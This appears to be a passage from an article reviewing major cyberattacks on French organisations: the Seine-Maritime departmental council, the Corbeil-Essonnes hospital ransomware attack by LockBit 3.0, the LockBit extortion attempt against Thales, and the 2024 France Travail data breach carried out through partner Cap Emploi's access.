On October 9, 2022, the Conseil départemental de la Seine-Maritime was the target of a large-scale cyberattack that paralyzed several of its departments. The circumstances of the attack are still unknown, but it severely handicapped the department’s administration and inhabitants. The council was forced to shut down its entire network and isolate its IT system. Several administrative services were disrupted, with a major impact on users, who found it impossible to carry out any procedures online. At the time of writing, the Seine-Maritime departmental council is still affected by this attack.

The Corbeil-Essonnes hospital cyber attack

On August 20-21, 2022, the Centre Hospitalier Sud Francilien in Corbeil-Essonnes was hit by ransomware from the group calling itself LockBit 3.0, which rendered business software, patient management storage systems and imaging systems inaccessible. The $10 million ransom demanded was never paid, in line with the French government’s strategy, and in late September the attackers published over 11 gigabytes of personal data on the darknet. The hospital struggled to get back on its feet, announcing a return to normal only in early November. This attack is one of the most striking in terms of the diversity of the actions involved: encryption of systems, theft of data, and public leaking to pressure the victim.

The cyber attack against Thalès

Twice hit by cyber attacks in 2022, Thales, the flagship of the French defence and aerospace industry, was targeted by the LockBit 3.0 group. The attackers threatened to publish internal documents unless the company paid, with a thirteen-day countdown. Claiming responsibility, LockBit 3.0 said it had gained access to Thales’s information system and compromised numerous sensitive documents. After investigation, however, the company found no intrusion into its systems.

The data stolen and published actually came from a code repository server, where less sensitive data was stored. This new trend of data theft and leakage, disguised as a direct attack on a company’s information system, is becoming more and more frequent, with the aim of destabilizing the company into paying a ransom out of fear of the financial, reputational and material consequences.

Cyber attack on FRANCE TRAVAIL

The data of up to 43 million jobseekers was exposed in an attack carried out between February 6 and March 5, 2024. Management had been alerted to the possibility of such a scenario. The volume of leaked data is estimated at 28 gigabytes, which does not necessarily represent everything taken: although the agency acknowledged that this volume did not really correspond to the total, there was still doubt as to whether the attackers had managed to steal everything, so it chose to communicate the maximum figure of 43 million people. The data includes surname, first name, postal address, e-mail address, telephone number and Social Security number (but not passwords or bank details, according to the organization). A real bounty for attackers.

The hackers did not attack France Travail directly. They went through an intermediary, in this case Cap Emploi. This organization, which helps disabled people find work, recently became a partner of France Travail. To this end, Cap emploi staff have been given access to part of France Travail’s jobseeker database: the so-called “user search system”.
